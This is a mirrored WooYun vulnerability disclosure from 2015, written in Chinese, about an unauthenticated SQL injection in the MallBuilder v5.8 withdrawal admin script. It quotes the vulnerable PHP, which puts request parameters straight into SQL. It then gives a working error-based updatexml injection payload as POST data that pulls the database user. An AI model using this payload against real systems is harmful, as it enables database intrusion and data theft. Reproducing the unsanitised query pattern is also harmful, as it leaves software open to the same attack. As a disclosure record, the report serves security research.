乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-17: 细节已通知厂商并且等待厂商处理中 2015-06-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
无需登录,直接出数据
看到paymenet\admin\withdraw.php
if($_GET['operation']=='edit'){ $sql="SELECT a.*,b.*,c.name as supportTimeName FROM ".CASHPICKUP." a left join ".PUSER." b on a.pay_uid=b.pay_id left join ".FEE." c on a.supportTime=c.id where a.id='$_GET[id]'"; $db->query($sql); $de=$db->fetchRow(); if($_POST['act']=='edit') { $add_time=time(); if($_POST['result']==10) { $sql = "update ".CASHPICKUP." set is_succeed='10',censor='$_SESSION[ADMIN_USER]',con='$_POST[con]' where id='$_POST[id]'"; $db->query($sql); } if($_POST['result']==20) { $sql = "update ".CASHPICKUP." set is_succeed='20',bankflow='$_POST[bankflow]',con='$_POST[con]',check_time='$add_time', censor='$_SESSION[ADMIN_USER]' where id='$_POST[id]'"; $db->query($sql); $sql="update ".CASHFLOW." set statu=4 where order_id='$_POST[id]' and pay_uid='$_POST[userid]'"; $db->query($sql); } if($_POST['result']==50) { $sql = "update ".CASHPICKUP." set is_succeed='50', check_time='$add_time', censor='$_SESSION[ADMIN_USER]',con='$_POST[con]' where id=$_POST[id]"; $db->query($sql); $m=$de['amount']+$de['fee']; //----------------------增加可用资金 $sql = "update ".PUSER." set cash=cash+$m where pay_id=$_POST[userid]"; $db->query($sql); //----------------------更新流水状态为0 $sql="update ".CASHFLOW." set statu=0 where order_id='$_POST[id]' and pay_uid='$_POST[userid]'"; $db->query($sql); } msg("?m=payment&s=withdraw.php"); }}
然后构造
http://127.0.0.1/mallbuilderv5.8/?m=payment&s=admin/withdraw&operation=edit
post数据
result=50&id=updatexml(1,concat(0x5c,user()),1)&act=edit
直接出数据
过滤
危害等级:无影响厂商忽略
忽略时间:2015-09-20 12:11
漏洞Rank:4 (WooYun评价)
暂无